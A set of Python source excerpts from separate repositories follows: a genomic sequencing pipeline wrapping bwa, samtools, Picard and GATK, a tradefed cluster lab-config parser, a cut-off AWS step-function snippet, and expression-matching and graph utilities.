actions=['secretsmanager:GetSecretValue'],
resources=[f'{secret.secret_arn}*']
))
return sfn_tasks.LambdaInvoke(
construct, 'Start EMR Cluster (with Secrets)',
output_path=output_path,
result_path=result_path,
lambda_function=run_job_flow_lambda,
integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,
payload=sfn.TaskInput.from_object({
'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
| |
<reponame>marcelcaraciolo/nextgen-pipeline
'''
All pipeline commands for NextGen Sequencing Pipeline (NGS)
'''
import sys
import os
from utils import runCommand, splitPath
import subprocess
def make_metadata_string(metadata):
return r'-r "@RG\tID:%s\tLB:%s\tSM:%s\tPL:%s"' % (metadata['ID'], metadata['LB'], metadata['SM'],
metadata['PL'])
def make_reference_database(command, algorithm, reference):
'''
Create reference database
'''
ref_database = reference + '.bwt'
if os.path.exists(ref_database):
print('Reference database already exists: using %s' % ref_database)
else:
command = command % {'algorithm': algorithm, 'prefix': reference, 'seq': reference + '.fasta'}
runCommand('Creating Reference Database', command)
return ref_database
def index_reference(reference):
reference_index = reference + '.fasta.fai'
if os.path.exists(reference_index):
print('Reflist already exists: using %s' % reference_index)
else:
sys.exit('check if the bwa index ran successfully')
def fastqc(command, sequences, fastq_metadata, output_dir):
'''
Run FastQC on each fastq file.
'''
for fastq_file in sequences:
command = command % {'outdir': output_dir, 'seq': fastq_file}
runCommand('Checking fastq quality', command)
def can_pipe(command, fastq_file):
'''
bwa-mem handles longer (> 70bp) reads with improved piping.
Randomly samples 5000 reads from the first two million.
Default to no piping if more than 75% of the sampled reads are small.
'''
min_size = 70
thresh = 0.75
head_count = 8000000
tocheck = 5000
cat_cmd = 'cat {fastq_file}'
cmd = (cat_cmd + " | head -n {head_count} | "
"{command} sample -s42 - {tocheck} | "
"awk '{{if(NR%4==2) print length($1)}}' | sort | uniq -c")
count_out = subprocess.check_output(cmd.format(**locals()), shell=True,
executable="/bin/bash", stderr=open("/dev/null", "w"))
if not count_out.strip():
raise IOError("Failed to check fastq file sizes with: %s" % cmd.format(**locals()))
shorter = 0
for count, size in (l.strip().split() for l in count_out.strip().split("\n")):
if int(size) < min_size:
shorter += int(count)
return (float(shorter) / float(tocheck)) <= thresh
def align_with_mem(command, threads, reference, fastq_file, pair_file, fastq_metadata, output_dir):
'''
Perform alignment on two paired-end fastq files to a reference genome to produce a sam file.
'''
(path, name, ext) = splitPath(fastq_file)
(pathP, nameP, extP) = splitPath(pair_file)
if ext != '.fastq' or extP != '.fastq':
sys.exit('align: one of the fastq file %s or %s does not have .fastq extension' % (fastq_file, pair_file))
sam_file = os.path.join(output_dir, os.path.splitext(os.path.basename(fastq_file))[0]) + '.sam'
sample = fastq_metadata[os.path.basename(fastq_file)]['sample']
run_id = fastq_metadata[os.path.basename(fastq_file)]['run_id']
lane = fastq_metadata[os.path.basename(fastq_file)]['lane']
identifier = fastq_metadata[os.path.basename(fastq_file)]['identifier']
readgroup_metadata = {'PL': 'ILLUMINA', 'SM': sample,
'LB': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane),
'ID': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane) }
metadata_str = make_metadata_string(readgroup_metadata)
command = command % {'threads': threads, 'meta': metadata_str, 'ref': reference,
'seq': fastq_file , 'pair': pair_file, 'out': sam_file}
runCommand('bwa mem alignment from fastq: %s' % sample, command)
return sam_file
def align(command, threads, reference, sequence, fastq_metadata, output_dir):
'''
Align sequence reads to the reference genome. This is the bwa's first stage, bwa aln.
'''
(path, name, ext) = splitPath(sequence)
if ext != '.fastq':
sys.exit('align: sequence file %s does not have .fastq extension' % sequence)
alignment_file = os.path.join(output_dir, name + '.sai')
command = command % {'out': alignment_file, 'threads': int(threads), 'ref': reference,
'seq': sequence, 'encodingflag': ''}
runCommand('Running Alignment', command)
return alignment_file
def alignPE2sam(command, reference, fastq_file, pair_file, sai_fastq_file, sai_pair_file,
fastq_metadata, output_dir):
'''
Convert alignments to SAM format. Turn bwa sai alignments into a sam file.
It uses bwa sampe commandline. (Pair End only)
'''
(path, name, ext) = splitPath(sai_fastq_file)
(pathP, nameP, extP) = splitPath(sai_pair_file)
if ext != '.sai' or extP != '.sai':
sys.exit('alignPE2sam: one .sai file %s or %s does not have .sai extension' % (sai_fastq_file, sai_pair_file))
sam_file = os.path.join(output_dir, os.path.splitext(os.path.basename(fastq_file))[0]) + '.sam'
sample = fastq_metadata[os.path.basename(fastq_file)]['sample']
run_id = fastq_metadata[os.path.basename(fastq_file)]['run_id']
lane = fastq_metadata[os.path.basename(fastq_file)]['lane']
identifier = fastq_metadata[os.path.basename(fastq_file)]['identifier']
readgroup_metadata = {'PL': 'ILLUMINA', 'SM': sample,
'LB': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane),
'ID': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane) }
metadata_str = make_metadata_string(readgroup_metadata)
command = command % {'meta': metadata_str, 'ref': reference, 'align': sai_fastq_file, 'alignP': sai_pair_file,
'seq': fastq_file , 'pair': pair_file, 'out': sam_file}
runCommand('bwa sampe alignment from fastq: %s' % sample, command)
return sam_file
def align2sam(command, reference, fastq_file, sai_fastq_file, fastq_metadata, output_dir):
"""
Convert alignments to SAM format. Turn bwa sai alignments into a sam file.
It uses bwa samse commandline.
"""
(path, name, ext) = splitPath(sai_fastq_file)
if ext != '.sai':
sys.exit('align2Sam: alignment file %s does not have .sai extension' % sai_fastq_file)
sam_file = os.path.join(output_dir, os.path.splitext(os.path.basename(fastq_file))[0]) + '.sam'
sample = fastq_metadata[os.path.basename(fastq_file)]['sample']
run_id = fastq_metadata[os.path.basename(fastq_file)]['run_id']
lane = fastq_metadata[os.path.basename(fastq_file)]['lane']
identifier = fastq_metadata[os.path.basename(fastq_file)]['identifier']
readgroup_metadata = {'PL': 'ILLUMINA', 'SM': sample,
'LB': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane),
'ID': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane) }
metadata_str = make_metadata_string(readgroup_metadata)
command = command % {'out': sam_file, 'ref': reference, 'align': sai_fastq_file,
'seq': fastq_file, 'meta': metadata_str}
runCommand('bwa samse alignment from fastq: %s' % sample, command)
return sam_file
def samP2bam(command, command_options, piccard_dir, alignment, output_dir):
"""
Convert sam to bam and sort, using Picard.
"""
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.sam':
sys.exit('sam2bam: alignment file %s does not have .sam extension' % alignment)
bam_file = os.path.join(output_dir, name + '.bam')
command = command % {'out': bam_file, 'sam': alignment, 'jvmoptions': command_options,
'picarddir': piccard_dir}
runCommand('Sam to Sorted Bam', command)
return bam_file
def samS2bam(command, command_options, threads, alignment, output_dir):
"""
Convert sam to bam and sort, using Samtools.
"""
(path, name, ext) = splitPath(alignment)
command_options = command_options
if ext != '.sam':
sys.exit('sam2Sbam: alignment file %s does not have .sam extension' % alignment)
bam_file = os.path.join(output_dir, name)
command = command % {'out': bam_file, 'sam': alignment, 'max_mem': command_options,
'threads': threads}
runCommand('Sam to Sorted Bam', command)
return bam_file + '.bam'
def indexbam(command, alignment, output_dir):
'''
Index alignment file (.bam) using Samtools
'''
(path, name, ext) = splitPath(alignment)
if ext != '.bam':
sys.exit('indexbam: alignment file %s does not have .bam extension' % alignment)
command = command % {'bam': alignment}
runCommand('Indexing alignment file', command)
index_file = os.path.join(output_dir, name.replace('.bam', '.bai'))
print command
return index_file
def dedup(command, command_options, piccard_dir, alignment, output_dir):
"""
Remove apparent duplicates using Picard MarkDuplicates
"""
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.bam':
sys.exit('mark pcr duplicates: alignment file %s does not have .bam extension' % alignment)
marked_bam_file = os.path.join(output_dir, name + '.marked.bam')
command = command % {'out': marked_bam_file, 'bam': alignment, 'jvmoptions': command_options, \
'picarddir': piccard_dir, 'log': 'metrics'}
runCommand('Marking PCR duplicates', command)
return marked_bam_file
def realign_intervals(command, command_options, gatk_dir, reference, alignment, output_dir):
"""
Run GATK RealignTargetCreator to find suspect intervals for realignment.
"""
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if not alignment.endswith('marked.bam'):
sys.exit('calculating realignment intervals: alignment file %s does not have .bam extension' % alignment)
interval_file = os.path.join(output_dir, name + '.bam.list')
command = command % {'out': interval_file, 'bam': alignment, 'jvmoptions': command_options, \
'gatkdir': gatk_dir, 'ref': reference + '.fasta'}
runCommand('Calculating realignment intervals', command)
return interval_file
def realign(command, command_options, gatk_dir, reference, alignment, intervals, output_dir):
'''
Run GATK IndelRealigner for local realignment, using intervals found by realign_intervals
'''
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if not intervals.endswith('bam.list') or ext != '.bam':
sys.exit('local realignment with intervals: intervals file %s does not have .list extension' % alignment)
realigned_bam = os.path.join(output_dir, name + '.realigned.bam')
command = command % {'jvmoptions': command_options, 'ref': reference + '.fasta', 'out': realigned_bam,
'bam': alignment, 'gatkdir': gatk_dir, 'intervals': intervals}
runCommand('Running local realignment around indels', command)
return realigned_bam
def fix_mate(command, command_options, piccard_dir, alignment, output_dir):
'''
Fix mate information in paired end data using picard
'''
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.bam':
sys.exit('mate information fix: alignment file %s does not have .bam extension' % alignment)
fixed_bam = os.path.join(output_dir, name + '.fixed.bam')
command = command % {'jvmoptions': command_options, 'out': fixed_bam,
'bam': alignment, 'picarddir': piccard_dir}
runCommand('Fixing Mate information', command)
return fixed_bam
def base_qual_recal_count(command, command_options, gatk_dir, reference, dbsnp, alignment, output_dir):
'''
GATK CountCovariates, first step of base quality score recalibration.
'''
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.bam':
sys.exit('count covariates: alignment file %s does not have .bam extension' % alignment)
recal_file = os.path.join(output_dir, name + '.recal_data.csv')
command = command % {'jvmoptions': command_options, 'out': recal_file, 'dbsnp': dbsnp,
'bam': alignment, 'gatkdir': gatk_dir, 'ref': reference + '.fasta'}
runCommand('count covariates for base quality score', command)
return recal_file
def base_qual_recal_tabulate(command, command_options, gatk_dir, reference, recal_file, alignment, output_dir):
'''
GATK TableRecalibration: recalibrate base quality scores using the output of CountCovariates.
'''
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.bam':
sys.exit('table recalibration: alignment file %s does not have .bam extension' % alignment)
recal_bam = os.path.join(output_dir, name + '.recal.bam')
command = command % {'jvmoptions': command_options, 'out': recal_bam, 'recalfile': | |
<reponame>maksonlee/tradefed_cluster
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for tradefed satellite lab configs."""
import collections
import itertools
import logging
import os
import six
import strictyaml as syaml
try:
from google.protobuf import json_format
except ImportError:
from google3.net.proto2.python.public import json_format
from tradefed_cluster.configs import lab_config_pb2
logger = logging.getLogger(__name__)
_DEFAULT_SHUTDOWN_TIMEOUT_SEC = 3600
class ConfigError(Exception):
"""Error raised if config is incorrect."""
pass
def _ProtoDescriptorToSchema(pb_descriptor):
"""Convert a proto Descriptor to a strictyaml schema."""
d = {}
for field in pb_descriptor.fields:
if field.LABEL_REPEATED == field.label:
value_schema = syaml.Seq(_ProtoFieldToSchema(field))
else:
value_schema = _ProtoFieldToSchema(field)
d[syaml.Optional(field.name)] = value_schema
return syaml.Map(d)
def _ProtoFieldToSchema(field):
"""Convert a Proto Field to strictyaml schema."""
if field.type == field.TYPE_STRING:
return syaml.Str()
if field.type == field.TYPE_BOOL:
return syaml.Bool()
if field.type in (field.TYPE_INT32, field.TYPE_UINT32,
field.TYPE_INT64, field.TYPE_UINT64):
return syaml.Int()
if field.type in (field.TYPE_DOUBLE, field.TYPE_FLOAT):
return syaml.Decimal()
if field.type == field.TYPE_MESSAGE:
return _ProtoDescriptorToSchema(field.message_type)
if field.type == field.TYPE_ENUM:
return syaml.Str()
raise ConfigError('Unknown field type in lab_config_pb2: %r.' % field.type)
_YAML_SCHEMA = _ProtoDescriptorToSchema(lab_config_pb2.LabConfig.DESCRIPTOR)
def Parse(yaml_file_obj):
"""Parse yaml config.
Args:
yaml_file_obj: yaml file obj.
Returns:
a lab_config_pb2.LabConfig proto.
Raises:
ConfigError: if the config is incorrect.
"""
content = six.ensure_str(yaml_file_obj.read())
try:
config_dict = syaml.dirty_load(
content, schema=_YAML_SCHEMA, allow_flow_style=True).data
except (syaml.YAMLError, TypeError) as e:
raise ConfigError(e)
try:
return json_format.ParseDict(config_dict, lab_config_pb2.LabConfig())
except json_format.ParseError as e:
raise ConfigError(e)
class HostConfig(object):
"""A host config object.
This class is immutable. The setter functions return a new HostConfig object.
"""
def __init__(
self,
host_config_pb,
cluster_config_pb,
lab_config_pb):
self.host_config_pb = lab_config_pb2.HostConfig()
self.cluster_config_pb = lab_config_pb2.ClusterConfig()
self.lab_config_pb = lab_config_pb2.LabConfig()
self.host_config_pb.CopyFrom(host_config_pb)
self.cluster_config_pb.CopyFrom(cluster_config_pb)
self.lab_config_pb.CopyFrom(lab_config_pb)
def Copy(self):
"""Copy the host config."""
return HostConfig(self.host_config_pb,
self.cluster_config_pb,
self.lab_config_pb)
@property
def hostname(self):
"""Get host's name."""
return self.host_config_pb.hostname
@property
def host_login_name(self):
"""Get host's login username."""
return (self.host_config_pb.host_login_name or
self.cluster_config_pb.host_login_name or
self.lab_config_pb.host_login_name)
@property
def tf_global_config_path(self):
"""Get tf global config for the host."""
return (self.host_config_pb.tf_global_config_path or
self.cluster_config_pb.tf_global_config_path)
@property
def lab_name(self):
"""Get host's lab's name."""
return self.lab_config_pb.lab_name
@property
def cluster_name(self):
"""Get host's cluster's name."""
return self.cluster_config_pb.cluster_name
@property
def control_server_url(self):
"""Get the master server the host connect to."""
# TODO: Deprecated, use control_server_url instead.
return (self.cluster_config_pb.control_server_url or
self.cluster_config_pb.master_url or
self.lab_config_pb.control_server_url or
self.lab_config_pb.master_url)
@property
def operation_mode(self):
"""Get the operation mode of the host."""
return self.lab_config_pb.operation_mode
@property
def docker_image(self):
"""Get the docker image the host to use."""
return (self.host_config_pb.docker_image or
self.cluster_config_pb.docker_image or
self.lab_config_pb.docker_image)
def SetDockerImage(self, val):
"""Create a new config with given value of docker_image."""
host_config = self.Copy()
host_config.host_config_pb.docker_image = val
return host_config
@property
def graceful_shutdown(self):
"""Graceful shutdown or not."""
return self.cluster_config_pb.graceful_shutdown or False
@property
def shutdown_timeout_sec(self):
"""The dockerized TradeFed shutdown timeouts in seconds."""
return self.cluster_config_pb.shutdown_timeout_sec
@property
def enable_stackdriver(self):
"""Enable stackdriver logging and monitor."""
return (self.cluster_config_pb.enable_stackdriver or
self.lab_config_pb.enable_stackdriver or
False)
@property
def enable_autoupdate(self):
"""Enable autoupdate mtt daemon process."""
return (self.host_config_pb.enable_autoupdate or
self.cluster_config_pb.enable_autoupdate or
self.lab_config_pb.enable_autoupdate)
@property
def extra_docker_args(self):
"""Extra docker args."""
return (list(self.cluster_config_pb.extra_docker_args or []) +
list(self.host_config_pb.extra_docker_args or []))
@property
def service_account_json_key_path(self):
"""The file path of service account json key."""
return self.lab_config_pb.service_account_json_key_path
@property
def docker_server(self):
"""Get the docker server the image is hosted on."""
return (self.host_config_pb.docker_server or
self.cluster_config_pb.docker_server or
self.lab_config_pb.docker_server)
@property
def secret_project_id(self):
"""Get secret project id."""
return self.lab_config_pb.secret_project_id
@property
def service_account_key_secret_id(self):
"""Get secret id for service account key."""
return self.lab_config_pb.service_account_key_secret_id
@property
def service_account(self):
"""Get service account."""
return self.lab_config_pb.service_account
def SetServiceAccountJsonKeyPath(self, val):
"""Create a new config with given value of service_account_json_key_path."""
host_config = self.Copy()
host_config.lab_config_pb.service_account_json_key_path = val
return host_config
@property
def tmpfs_configs(self):
"""Get tmpfs configs to mount into the container.
Return the tmpfs configs merged the tmpfs configs for the cluster and
the host. If the path of the tmpfs configs are the same, pick the one from
the host config.
Returns:
a list of tmpfs configs.
"""
path_to_tmpfs = collections.OrderedDict()
for tmpfs_config in self.cluster_config_pb.tmpfs_configs or []:
path_to_tmpfs[tmpfs_config.path] = tmpfs_config
for tmpfs_config in self.host_config_pb.tmpfs_configs or []:
path_to_tmpfs[tmpfs_config.path] = tmpfs_config
return list(path_to_tmpfs.values())
@property
def enable_ui_update(self):
"""Whether host update from UI is enabled."""
return bool(self.host_config_pb.enable_ui_update or
self.cluster_config_pb.enable_ui_update or
self.lab_config_pb.enable_ui_update)
@property
def owners(self):
"""Inherit the owners field from parent cluster or lab."""
return list(set(owner for owner in itertools.chain(
self.cluster_config_pb.owners, self.lab_config_pb.owners)))
@property
def engprod_api_key(self):
"""API Key for Android Engprod API discovery."""
return self.lab_config_pb.engprod_api_key
@property
def inventory_groups(self):
return self.host_config_pb.inventory_groups
@property
def max_local_virtual_devices(self):
return self.host_config_pb.max_local_virtual_devices
@property
def ssh_arg(self):
"""Get host's ssh arg."""
return self.lab_config_pb.ssh_arg
def Save(self, output_file_path):
"""Save the config to a file."""
lab_config_pb = lab_config_pb2.LabConfig()
lab_config_pb.CopyFrom(self.lab_config_pb)
del lab_config_pb.cluster_configs[:]
cluster_config_pb = lab_config_pb2.ClusterConfig()
cluster_config_pb.CopyFrom(self.cluster_config_pb)
del cluster_config_pb.host_configs[:]
cluster_config_pb.host_configs.add().CopyFrom(self.host_config_pb)
lab_config_pb.cluster_configs.add().CopyFrom(cluster_config_pb)
with open(output_file_path, 'w') as f:
lab_config_dict = json_format.MessageToDict(
lab_config_pb,
preserving_proto_field_name=True)
f.write(syaml.as_document(lab_config_dict, schema=_YAML_SCHEMA).as_yaml())
def __eq__(self, other):
if not isinstance(other, HostConfig):
return False
property_names = [name for name, obj
in vars(HostConfig).items()
if isinstance(obj, property)]
return all(getattr(self, property_name) == getattr(other, property_name)
for property_name in property_names)
def __repr__(self):
lines = []
for name, obj in vars(HostConfig).items():
if not isinstance(obj, property):
continue
lines.append('%s: %s' % (name, getattr(self, name)))
return '\n'.join(lines)
def CreateHostConfig(
lab_name=None,
cluster_name=None,
hostname=None,
host_login_name=None,
tf_global_config_path=None,
tmpfs_configs=None,
docker_image=None,
graceful_shutdown=False,
shutdown_timeout_sec=_DEFAULT_SHUTDOWN_TIMEOUT_SEC,
enable_stackdriver=False,
enable_autoupdate=False,
service_account_json_key_path=None,
docker_server=None,
extra_docker_args=(),
control_server_url=None,
secret_project_id=None,
service_account_key_secret_id=None,
service_account=None,
enable_ui_update=None,
engprod_api_key=None,
ssh_arg=None,
operation_mode=None,
max_local_virtual_devices=None,
):
"""Create a host config from raw data.
Args:
lab_name: lab name.
cluster_name: cluster name.
hostname: hostname.
host_login_name: user name to login.
tf_global_config_path: tf global config path.
tmpfs_configs: a list of TmpfsConfig proto.
docker_image: the docker image to use.
graceful_shutdown: graceful shutdown the host or not.
shutdown_timeout_sec: int, the dockerized TF shutdown timeout.
enable_stackdriver: enable stackdriver monitor or not.
enable_autoupdate: enable auto-update daemon or not.
service_account_json_key_path: string or None, the file path of service
account json key.
docker_server: the docker server that hosts the image.
extra_docker_args: extra docker args to pass to docker container.
control_server_url: the control server the host connect to.
secret_project_id: Google Cloud Project for storing secret.
service_account_key_secret_id: Secret id for service account key.
service_account: Service account for the lab.
enable_ui_update: bool, whether host update from UI is enabled.
engprod_api_key: string, API Key for Android Engprod API discovery.
ssh_arg: string, ssh args to the host.
operation_mode: string, host operation mode.
max_local_virtual_devices: int, maximum number of virtual devices
Returns:
a HostConfig have all those data.
"""
host_config_pb = lab_config_pb2.HostConfig(
hostname=hostname,
tf_global_config_path=tf_global_config_path,
tmpfs_configs=tmpfs_configs,
enable_autoupdate=enable_autoupdate,
docker_image=docker_image,
docker_server=docker_server,
extra_docker_args=list(extra_docker_args),
enable_ui_update=enable_ui_update,
max_local_virtual_devices=max_local_virtual_devices,)
cluster_config_pb = lab_config_pb2.ClusterConfig(
cluster_name=cluster_name,
host_login_name=host_login_name,
host_configs=[host_config_pb],
docker_image=docker_image,
graceful_shutdown=graceful_shutdown,
shutdown_timeout_sec=shutdown_timeout_sec,
enable_stackdriver=enable_stackdriver,
control_server_url=control_server_url)
lab_config_pb = lab_config_pb2.LabConfig(
lab_name=lab_name,
cluster_configs=[cluster_config_pb],
docker_server=docker_server,
service_account_json_key_path=service_account_json_key_path,
secret_project_id=secret_project_id,
service_account_key_secret_id=service_account_key_secret_id,
service_account=service_account,
engprod_api_key=engprod_api_key,
ssh_arg=ssh_arg,
operation_mode=operation_mode)
return HostConfig(host_config_pb, cluster_config_pb, lab_config_pb)
def CreateTmpfsConfig(path, size, mode):
"""Create a TmpfsConfig object."""
return lab_config_pb2.TmpfsConfig(path=path, size=size, mode=mode)
def IsYaml(path):
"""Is path a yaml file or not."""
return path.endswith('.yaml')
def LocalFileEnumerator(root_path, filename_filter=None):
"""Enumerator files from local path.
Args:
root_path: the root of all configs.
filename_filter: only return files that match the filter
Yields:
a file like obj
Raises:
ConfigError: raise if the config path doesn't exist.
"""
logger.debug('Get file from root %s.', root_path)
if not root_path:
return
paths = [root_path]
while paths:
path = paths.pop(0)
if not os.path.exists(path):
raise ConfigError('%s doesn\'t exist.' % path)
if os.path.isfile(path):
if filename_filter and not filename_filter(path):
continue
logger.debug('Read from %s.', path)
with open(path, 'r') as file_obj:
yield file_obj
else:
for root, _, filenames in os.walk(path):
for filename in filenames:
subpath = os.path.join(root, filename)
paths.append(subpath)
class LabConfigPool(object):
"""A config pool that can query configs for host and cluster."""
def __init__(self, file_enumerator=None):
self.file_enumerator = file_enumerator
self._lab_to_lab_config_pb = {}
self._cluster_to_cluster_config_pb = {}
self._cluster_to_lab_config_pb = {}
self._host_to_host_config = {}
self._cluster_to_host_configs = collections.defaultdict(list)
self._all_host_configs = []
def LoadConfigs(self):
"""Load configs in the given path."""
if not self.file_enumerator:
logging.debug('Lab config is not set.')
return
has_config = False
for file_obj in self.file_enumerator:
has_config = True
self._LoadConfig(file_obj)
if not has_config:
raise ConfigError(
'Lab config path is set, '
'but there is no lab config files under the path.')
if len(self._lab_to_lab_config_pb.keys()) > 1:
raise ConfigError(
'There are multiple labs configured: %s.' %
self._lab_to_lab_config_pb.keys())
def _LoadConfig(self, file_obj):
"""Load one config file."""
lab_config_pb = Parse(file_obj)
self._lab_to_lab_config_pb[lab_config_pb.lab_name] = lab_config_pb
for cluster_config_pb in lab_config_pb.cluster_configs:
self._cluster_to_cluster_config_pb[cluster_config_pb.cluster_name] = (
cluster_config_pb)
self._cluster_to_lab_config_pb[cluster_config_pb.cluster_name] = (
lab_config_pb)
for host_config_pb | |
for i, cl in enumerate(cluster_inds):
if not cl in clusters: clusters[cl] = []
clusters[cl].append(i)
new_stmts = [None for _ in range(len(exprs))]
for cl, inds in clusters.items():
medioid = [-math.inf, -1]
for i in range(len(exprs)):
s_sum = sum([wts[i][j][0] for j in range(len(exprs))])
if s_sum > medioid[0]: medioid = [s_sum, i]
md_ind = medioid[1]
#md_ind = 0
for j in inds:
sc, subst = wts[md_ind][j]
new_expr = apply_subst(exprs[j], subst)
new_stmts[j] = new_expr
return new_stmts
def find_good_subst(expr_subexprs, alt_info, expr_par_info, alt_par_info,
var_hashes):
# build up substitution for each expression
subst, supp_by, change, nogoods = {}, [], True, set()
all_vars = set([s for a, h, s in expr_subexprs if a == ('VAR',)])
while all_vars:
best_subst = [0, subst]
for av_k, hash_av_k, subexpr in expr_subexprs:
if type(subexpr) != tuple: continue
if not hash_av_k in alt_info: continue
if not subexpr in var_hashes:
var_hashes[subexpr] = {}
get_var_hashes(subexpr, var_hashes[subexpr])
s1_hashes = var_hashes[subexpr]
for a_i, alt_subexpr in enumerate(alt_info[hash_av_k]):
if (hash_av_k, a_i) in nogoods: continue
if is_rn_var(alt_subexpr):
if get_var_name(alt_subexpr) == get_var_name(subexpr): a_sc = 2
else: a_sc = 1
a_sc = match_par_info(expr_par_info[subexpr],
alt_par_info[alt_subexpr])
else: a_sc = len(av_k)
if a_sc <= best_subst[0]: continue
if not alt_subexpr in var_hashes:
var_hashes[alt_subexpr] = {}
get_var_hashes(alt_subexpr, var_hashes[alt_subexpr])
s2_hashes = var_hashes[alt_subexpr]
fnd_subst = find_valid_subst(s1_hashes, s2_hashes, dict(subst))
if fnd_subst != False and any(not k in subst for k in fnd_subst.keys()):
best_subst = [a_sc, fnd_subst]
else: nogoods.add((hash_av_k, a_i))
# exit if nothing found
if best_subst[0] == 0: break
supp_by.append(best_subst[0])
subst = best_subst[1]
for k in subst.keys():
if k in all_vars: all_vars.remove(k)
return np.sum(supp_by), subst
def match_par_info(se1_info, se2_info):
#return 1 / (1 + abs(se1_info - se2_info))
ct = 0
for p in se1_info:
if p in se2_info:
ct += 1
return ct
def find_good_subst_2(expr_subexprs, alt_info, expr_par_info, alt_par_info,
var_hashes):
# build up substitution for each expression
subst, supp_by = {}, []
for av_k, hash_av_k, subexpr in expr_subexprs:
if type(subexpr) == tuple: continue
if not hash_av_k in alt_info: continue
if not subexpr in var_hashes:
var_hashes[subexpr] = {}
get_var_hashes(subexpr, var_hashes[subexpr])
s1_hashes = var_hashes[subexpr]
for alt_subexpr in alt_info[hash_av_k]:
if not alt_subexpr in var_hashes:
var_hashes[alt_subexpr] = {}
get_var_hashes(alt_subexpr, var_hashes[alt_subexpr])
s2_hashes = var_hashes[alt_subexpr]
fnd_subst = find_valid_subst(s1_hashes, s2_hashes, dict(subst))
if fnd_subst != False and any(not k in subst for k in fnd_subst.keys()):
subst = fnd_subst
supp_by.append(len(av_k))
return np.sum(supp_by), subst
def apply_subst(expr, subst):
if type(expr) == tuple:
new_expr = [expr[0]]
for i, el in enumerate(expr):
if i == 0: continue
new_expr.append(apply_subst(el, subst))
return tuple(new_expr)
elif expr in subst: return subst[expr] + ''
else: return expr + ''
def find_valid_subst(e1_hashes, e2_hashes, subst=None):
if subst == None: subst = {}
rev_subst = dict([(v, k) for k, v in subst.items()])
e1_hashes, e2_hashes = dict(e1_hashes), dict(e2_hashes)
# we require a perfect bipartite matching to be considered alpha-equivalent
if len(e1_hashes.keys()) != len(e2_hashes.keys()): return False
assignments = set()
for ent1, c_hv in e1_hashes.items():
found = False
for ent2, p_hv in e2_hashes.items():
if c_hv != p_hv: continue
if is_rn_var(ent1) != is_rn_var(ent2): continue
if ent1 in subst and subst[ent1] != ent2: continue
if ent2 in rev_subst and rev_subst[ent2] != ent1: continue
if is_rn_var(ent1) or ent1 == ent2:
found = ent2
break
if found == False: return False
assignments.add((ent1, found))
del e2_hashes[found]
# if we get here, prem_entity_hashes should be empty
if e2_hashes != {}: return False
for a, b in assignments: subst[a] = b
return subst
def get_var_hashes(expr, hashes, src_hash=None):
if src_hash == None: src_hash = 0
new_tup = []
if (not is_rn_var(expr)) and type(expr) == tuple:
lead = (expr[0], len(expr))
for i, el in enumerate(expr):
if i == 0: continue
# partial ordering edge labels will account for orderedness of lead
edge_hash = hash((lead, i))
new_src_hash = hash(src_hash + edge_hash)
get_var_hashes(el, hashes, new_src_hash)
else:
if is_rn_var(expr): lead = ('VAR', 0)
else: lead = (expr, 0)
if not expr in hashes: hashes[expr] = hash(lead)
hashes[expr] += hash(src_hash + hashes[expr])
#################
# Matching utilities
#################
def maximal_var_subst(paths1, paths2):
all_wts = []
for p_k, p_paths in paths1.items():
if not is_rn_var(p_k): continue
for c_k, c_paths in paths2.items():
pc_wt = get_alignment_score(p_paths, c_paths)
if pc_wt > 0: all_wts.append((p_k, c_k, pc_wt))
score_of, var_subst = 0, {}
while all_wts:
best_l, best_r, best_wt = max(all_wts, key=lambda x : x[2])
var_subst[best_l] = best_r
all_wts = [(l, r, w) for l, r, w in all_wts
if l != best_l and r != best_r]
score_of += best_wt
return score_of, var_subst
def get_alignment_score(p_paths, c_paths, cos=True):
dot_prod = sparse_dot_prod(p_paths, c_paths)
if cos:
n1 = np.sqrt(sum([pow(x[1], 2) for x in p_paths]))
n2 = np.sqrt(sum([pow(x[1], 2) for x in c_paths]))
if n1 * n2 == 0: score = 0
else: score = dot_prod / (n1 * n2)
else:
score = dot_prod
return score
def sparse_dot_prod(lst1, lst2):
dot_prod, i, j = 0, 0, 0
while i < len(lst1) and j < len(lst2):
if lst1[i][0] == lst2[j][0]:
dot_prod += lst1[i][1] * lst2[j][1]
i += 1
j += 1
elif lst1[i][0] < lst2[j][0]: i += 1
else: j += 1
return dot_prod
def get_paths_upto(set_lst, prov, path_len=3, just_syms=True, dp_form=True, all_len=True):
paths = [[s_l] for s_l in set_lst]
fin_paths = []
for i in range(path_len - 1):
new_paths = []
for p in paths:
last_el = p[-1]
if last_el in prov:
for new_el in prov[last_el]:
new_paths.append(p + [new_el])
if all_len:
fin_paths.append(p)
paths = new_paths
ret_paths = fin_paths + paths
if just_syms: ret_paths = [[(r[0] if type(r) == tuple else r) for r in p]
for p in ret_paths]
if dp_form:
d = {}
for el in ret_paths:
k = '___'.join(el)
if not k in d: d[k] = 0
d[k] += 1
return sorted(d.items(), key=lambda x : x[0])
return ret_paths
#################
# Graph utilities
#################
def topologically_group(graph):
par_dict = {}
for node in graph.nodes:
if not node in par_dict: par_dict[node] = set()
for par in graph.predecessors(node):
par_dict[node].add(par)
# should be redundant, but just in case...
for arg in graph.successors(node):
if not arg in par_dict: par_dict[arg] = set()
par_dict[arg].add(node)
# actual layers
update_layers = []
